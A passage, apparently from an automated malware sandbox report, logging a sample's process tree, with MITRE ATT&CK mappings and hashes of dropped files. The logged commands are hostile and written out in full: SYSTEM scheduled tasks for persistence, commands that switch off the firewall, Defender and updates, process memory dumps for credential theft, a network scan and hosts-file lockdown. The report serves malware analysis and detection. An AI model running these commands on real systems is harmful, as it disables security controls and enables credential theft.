  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "uzepinzue" /ru system /tr "cmd /c C:\Windows\ime\zyejeil.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1228
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1020
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "uzepinzue" /ru system /tr "cmd /c C:\Windows\ime\zyejeil.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3156
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "klgkbwlmf" /ru system /tr "cmd /c echo Y|cacls C:\Windows\uzepkltb\zyejeil.exe /p everyone:F"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2760
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2156
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "klgkbwlmf" /ru system /tr "cmd /c echo Y|cacls C:\Windows\uzepkltb\zyejeil.exe /p everyone:F"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:756
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "pbmtpletu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\stjqapuut\ejzklm.exe /p everyone:F"
  2⤵
  PID:2924
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2576
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "pbmtpletu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\stjqapuut\ejzklm.exe /p everyone:F"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:1552
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2016
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4332
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:2460
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:3604
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4752
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:1492
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:864
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:4392
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4724
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:1528
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:1944
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4456
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop SharedAccess
  2⤵
  PID:4024
- - C:\Windows\SysWOW64\net.exe
    net stop SharedAccess
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5024
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SharedAccess
      4⤵
      System Location Discovery: System Language Discovery
      PID:1420
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh firewall set opmode mode=disable
  2⤵
  PID:4768
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall set opmode mode=disable
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:1764
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh Advfirewall set allprofiles state off
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3276
- - C:\Windows\SysWOW64\netsh.exe
    netsh Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:4348
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop MpsSvc
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1820
- - C:\Windows\SysWOW64\net.exe
    net stop MpsSvc
    3⤵
    - System Location Discovery: System Language Discovery
    PID:752
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MpsSvc
      4⤵
      System Location Discovery: System Language Discovery
      PID:4792
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop WinDefend
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2676
- - C:\Windows\SysWOW64\net.exe
    net stop WinDefend
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3192
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop WinDefend
      4⤵
      System Location Discovery: System Language Discovery
      PID:2184
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop wuauserv
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4912
- - C:\Windows\SysWOW64\net.exe
    net stop wuauserv
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4588
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop wuauserv
      4⤵
      System Location Discovery: System Language Discovery
      PID:2544
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config MpsSvc start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3296
- - C:\Windows\SysWOW64\sc.exe
    sc config MpsSvc start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:2760
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config SharedAccess start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3232
- - C:\Windows\SysWOW64\sc.exe
    sc config SharedAccess start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:5072
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config WinDefend start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4884
- - C:\Windows\SysWOW64\sc.exe
    sc config WinDefend start= disabled
    3⤵
    - Launches sc.exe
    PID:3872
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config wuauserv start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2044
- - C:\Windows\SysWOW64\sc.exe
    sc config wuauserv start= disabled
    3⤵
    - Launches sc.exe
    PID:4136
- C:\Windows\TEMP\xohudmc.exe
  C:\Windows\TEMP\xohudmc.exe
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:2908
- C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe
  C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 780 C:\Windows\TEMP\lrcwzntnt\780.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3252
- C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe
  C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 60 C:\Windows\TEMP\lrcwzntnt\60.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2024
- C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe
  C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 2132 C:\Windows\TEMP\lrcwzntnt\2132.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4868
- C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe
  C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 2644 C:\Windows\TEMP\lrcwzntnt\2644.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:452
- C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe
  C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 2788 C:\Windows\TEMP\lrcwzntnt\2788.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1984
- C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe
  C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 2836 C:\Windows\TEMP\lrcwzntnt\2836.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4488
- C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe
  C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 3116 C:\Windows\TEMP\lrcwzntnt\3116.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1820
- C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe
  C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 3876 C:\Windows\TEMP\lrcwzntnt\3876.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2480
- C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe
  C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 3968 C:\Windows\TEMP\lrcwzntnt\3968.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4340
- C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe
  C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 4032 C:\Windows\TEMP\lrcwzntnt\4032.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4708
- C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe
  C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 2832 C:\Windows\TEMP\lrcwzntnt\2832.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4468
- C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe
  C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 2328 C:\Windows\TEMP\lrcwzntnt\2328.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1048
- C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe
  C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 3980 C:\Windows\TEMP\lrcwzntnt\3980.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4400
- C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe
  C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 1800 C:\Windows\TEMP\lrcwzntnt\1800.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2152
- C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe
  C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 800 C:\Windows\TEMP\lrcwzntnt\800.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4024
- C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe
  C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 460 C:\Windows\TEMP\lrcwzntnt\460.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1916
- C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe
  C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 920 C:\Windows\TEMP\lrcwzntnt\920.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1568
- C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe
  C:\Windows\TEMP\lrcwzntnt\ucqzmelym.exe -accepteula -mp 4352 C:\Windows\TEMP\lrcwzntnt\4352.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:5000
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c C:\Windows\lrcwzntnt\bmkbibntg\scan.bat
  2⤵
  PID:4924
- - C:\Windows\lrcwzntnt\bmkbibntg\nusubcedp.exe
    nusubcedp.exe TCP 181.215.0.1 181.215.255.255 7001 512 /save
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    PID:1628
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  - System Location Discovery: System Language Discovery
  PID:900
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2320
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4400
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2572
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    PID:1712
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:6128
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1020

C:\Windows\SysWOW64\cusoqc.exe
C:\Windows\SysWOW64\cusoqc.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4208

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\ime\zyejeil.exe
1⤵
PID:1812
- C:\Windows\ime\zyejeil.exe
  C:\Windows\ime\zyejeil.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:3000

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\uzepkltb\zyejeil.exe /p everyone:F
1⤵
PID:5000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:4580
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\uzepkltb\zyejeil.exe /p everyone:F
  2⤵
  PID:3280

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\stjqapuut\ejzklm.exe /p everyone:F
1⤵
PID:4060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:4884
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\TEMP\stjqapuut\ejzklm.exe /p everyone:F
  2⤵
  PID:1568

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\ime\zyejeil.exe
1⤵
PID:3324
- C:\Windows\ime\zyejeil.exe
  C:\Windows\ime\zyejeil.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:2372

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\stjqapuut\ejzklm.exe /p everyone:F
1⤵
PID:6128
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:3528
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\TEMP\stjqapuut\ejzklm.exe /p everyone:F
  2⤵
  PID:3848

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\uzepkltb\zyejeil.exe /p everyone:F
1⤵
PID:3272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:4516
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\uzepkltb\zyejeil.exe /p everyone:F
  2⤵
  PID:1972

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

OS Credential Dumping

T1003

LSASS Memory

T1003.001

Discovery

Network Service Discovery

T1046

Network Share Discovery

T1135

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\SysWOW64\Packet.dll

Filesize
95KB

MD5
86316be34481c1ed5b792169312673fd

SHA1
6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

SHA256
49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

SHA512
3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

Download Submit
C:\Windows\SysWOW64\wpcap.dll

Filesize
275KB

MD5
4633b298d57014627831ccac89a2c50b

SHA1
e5f449766722c5c25fa02b065d22a854b6a32a5b

SHA256
b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

SHA512
29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

Download Submit
C:\Windows\TEMP\lrcwzntnt\1800.dmp

Filesize
8.8MB

MD5
1415426d87d7ffc11e8b94f6f121f91d

SHA1
608150283e873aeb092a0a9aadc730d39740ccad

SHA256
c26d6a964780b710a20b0cc6ad133e13123301a946d7188af1948a4e607a74a0

SHA512
2f418473ed6c03fc6efb50d3fc00e02a1740938c2d294ec909b79c7b09c6468307a421515ddad6be9aad832b8c4dbb3b8b4d1f72331c101da4e457a29a96bdbb

Download Submit
C:\Windows\TEMP\lrcwzntnt\2132.dmp

Filesize
4.2MB

MD5
ab10dbb127794e91ecda4b772afcec35

SHA1
b418448bed92cfa14f019027ae3babe888deefa5

SHA256
2abc06d02acc1b1b81c565352ce792a7902a24e29b6eec0b83100dc23674b719

SHA512
b85c6ac9a221b3b568674ec80cac57597cc9303783096546bee3a9e4a76100ef3b3b7e3444e05af59bcf73c7ea3dcd65cfe9339df771a4fc88b3ced01d4291df

Download Submit
C:\Windows\TEMP\lrcwzntnt\2328.dmp

Filesize
1.2MB

MD5
553dc8e3453a51df74f394d04968bfe5

SHA1
7b2659d87f6bd2f70b208942f47f854b42a8bf08

SHA256
2f64f47318f469486f3959faf4be899d71572ef5f591a56b8298f1dbdbb77c77

SHA512
e95bcf07f3feb617fc03bc8fbc2d56339b5c3df0c1b68bba229766450d56a8e1d207b36fb4297eb841d65da5b16e604cb8f98e91ed3ab4cce7ffc5c416e33a4f

Download Submit
C:\Windows\TEMP\lrcwzntnt\2644.dmp

Filesize
3.8MB

MD5
843692a7f37a96b34ba0f605aae4fb90

SHA1
2e19c8e46151819736b43e5fe54ca954fbba12cf

SHA256
6ae554845ae1af6edfb36ed5d07fc49fa1b77916d5732fb9eab8cdeb7b5b7b20

SHA512
cd4b14aea11992ee3f96479ea36926d4b3b26007103fe6cbbfe448cf2337368e22a95b77dbf3dac1e9749c6ec4ab0ffbb74fbdb9b90d9412fb8d3fb9a0b24955

Download Submit
C:\Windows\TEMP\lrcwzntnt\2788.dmp

Filesize
2.9MB

MD5
4853ccbf266a55762db813226dd5415e

SHA1
e5a3395f063153e23542ab2e58ec92d3ad3e2dd8

SHA256
318f8eb40cd40e2c99c13c51694ca202276d2c18bc63584b0489356748b51dd7

SHA512
a62c148281e2d92237f7bb314ae45a5e947f948539a95e4dcae8a75118600c7ffe8cd045322f20b02c80819049fe8216b7d43ddbb731a1260a219f4bedceccbb

Download Submit
C:\Windows\TEMP\lrcwzntnt\2832.dmp

Filesize
44.3MB

MD5
adae35f0af1bc30155211f4c68309850

SHA1
d3961d6f255f05e8a150ef2a5ddd369e5dda0a2b

SHA256
e519ed5e03fda2f36710ba5fc4db94a9f927dc2d95be9dd4d6d822c822472125

SHA512
a3010778eca51bfc216561baff8a9cf512c72df5b3235c95a9b4dfa1ec341a61f857be5e25db7f9558ce3f51370fe2954d2badb21b4a12aab865c2cd0586dfe2

Download Submit
C:\Windows\TEMP\lrcwzntnt\2836.dmp

Filesize
7.5MB

MD5
4b91c87f7fe57c942467e6e4cc200ea8

SHA1
b4b63031054849a389d221acad0f05f5cd27c087

SHA256
9d036b8fb77078582d733fd4e14606867413b3ca863eff97cb48a3d9ecfaa4c3

SHA512
d873100b473dcd4b14541f0969be461097ba5b3bbd8bb8eb9c83f9b4166ac8181e703c14cb95e19c6e6293bb15329b397fc884ed1c0d807b6e2227ce356e6963

Download Submit
C:\Windows\TEMP\lrcwzntnt\3116.dmp

Filesize
818KB

MD5
3e61e3bcfacd58221713a0abad00d13d

SHA1
0e5d4f7a3040e9f9808a3f8c213b9d23c4023ad7

SHA256
0ae368918c440ea9faa051e939165c0047bf2ef8c0860994ce333cfe9b01e8b0

SHA512
b20db2bf7c5a7aa8d2c75901fb344259f641265af39dd8c27c5838a24068cfe58fbc5feaa5c66b54d4fdc369550e71ceaee15593cfe09c80d79b261d7c8f3df2

Download Submit
C:\Windows\TEMP\lrcwzntnt\3876.dmp

Filesize
2.4MB

MD5
c58ad4430f1525acfcfb35564a8d257e

SHA1
9ee1280656b809d6f19578374c650b8fbe8c4348

SHA256
fa973b3da3106c20e717c8550503552f213da942d64e2916a8dca57db992453e

SHA512
1bb864633936231af659884502429d32ddebcd05a01e88123b7011d4155a6d0c59c15576c530b3694698f0abcc3ddc633bf5a168a6d6e6a1c7ea341597cc27b0

Download Submit
C:\Windows\TEMP\lrcwzntnt\3968.dmp

Filesize
20.9MB

MD5
7fc46a352f6a1c3162de285c17c90cda

SHA1
447551ff2f82e7f06bddd0f8b97e361e360370f0

SHA256
41eddf371a8c773b0e21d0edcb50f85f53742cd8f93ab784eb65c5c76ded6ba1

SHA512
8459de5bdfa8d1a234ecee6c084fbc6b7ba0c4977e3f3427f74a596f942027c5f25ae69b1d290037142993a925a1b7502c45020d82cd2424ddcba24033e76228

Download Submit
C:\Windows\TEMP\lrcwzntnt\3980.dmp

Filesize
25.9MB

MD5
0f0e98bdbbf3ae237fa052bdf23f2845

SHA1
cc199fcdc3969af25ea42296507db7380f85b6f5

SHA256
14d03ee78798efcc95a426b8582d64b8d6f2ba3d70d408339ddaee9eef80d5ef

SHA512
f5afe78789cd341ded96cc9d0bfb4919e07fd7b3bf3b1b0f2802f1d8f7e37275b567a3ff1a7d34400e860327dc1677260154ecfe1b236add90733af424207068

Download Submit
C:\Windows\TEMP\lrcwzntnt\4032.dmp

Filesize
4.3MB

MD5
21faae6c4d9810f4fa57bff1327bf0ee

SHA1
11e115b1d6206dfbd76c8a122fb7725e49786d17

SHA256
d73fbe7be98bc470b2ed10c3adeffe0348985bfd7fdea689be78f39bbb8ea094

SHA512
49271d4a47e755e658d9566015a322673cb9e19a03e5a8f81afa07da5774813714bcce1b035f27f91184467d41ee7d88e2ee15ada54cbd2ed1126eab40c2dfb6

Download Submit
C:\Windows\TEMP\lrcwzntnt\60.dmp

Filesize
33.4MB

MD5
c049884c27cffbd4415db7e55fc39641

SHA1
cf320449d797c423f99543031c3f19c02ae93711

SHA256
01de67242b6422e0ba74f0fd7d18cb0b2d5f30eeac6a9e4022cc8d3cf9a45f77

SHA512
6f76bad0fd397f1d7f6999759f8263d46057215cf43fde6904d269fb61cb6f4e3e3938abbf5ff9cc29aad37168dfc027d69a4c7f5fccf45fe4a8e7b0b9a85cf9

Download Submit
C:\Windows\TEMP\lrcwzntnt\780.dmp

Filesize
3.3MB

MD5
ba210dec83fe3132052a77fb5da8b591

SHA1
4e672981df5af7da536655c4d3eb8599f9c4cf9f

SHA256
19e68134fbc2f38440098d1be3df9c13508beba080986ea1d59fdd2b4a9f0a95

SHA512
b587362414f2771b15380161c5437df5defc1e1717a422023b8ba97c9d6cb8f72f219d51cbb99343e1fcc4bff4c0e1626f92fabd18eea644b66ab27bc8e36cbc

Download Submit
C:\Windows\TEMP\stjqapuut\config.json

Filesize
693B

MD5
f2d396833af4aea7b9afde89593ca56e

SHA1
08d8f699040d3ca94e9d46fc400e3feb4a18b96b

SHA256
d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34

SHA512
2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01

Download Submit
C:\Windows\Temp\lrcwzntnt\ucqzmelym.exe

Filesize
126KB

MD5
e8d45731654929413d79b3818d6a5011

SHA1
23579d9ca707d9e00eb62fa501e0a8016db63c7e

SHA256
a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

SHA512
df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

Download Submit
C:\Windows\Temp\nsjDCD5.tmp\System.dll

Filesize
11KB

MD5
2ae993a2ffec0c137eb51c8832691bcb

SHA1
98e0b37b7c14890f8a599f35678af5e9435906e1

SHA256
681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59

SHA512
2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9

Download Submit
C:\Windows\Temp\nsjDCD5.tmp\nsExec.dll

Filesize
6KB

MD5
b648c78981c02c434d6a04d4422a6198

SHA1
74d99eed1eae76c7f43454c01cdb7030e5772fc2

SHA256
3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

SHA512
219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

Download Submit
C:\Windows\Temp\stjqapuut\ejzklm.exe

Filesize
343KB

MD5
2b4ac7b362261cb3f6f9583751708064

SHA1
b93693b19ebc99da8a007fed1a45c01c5071fb7f

SHA256
a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23

SHA512
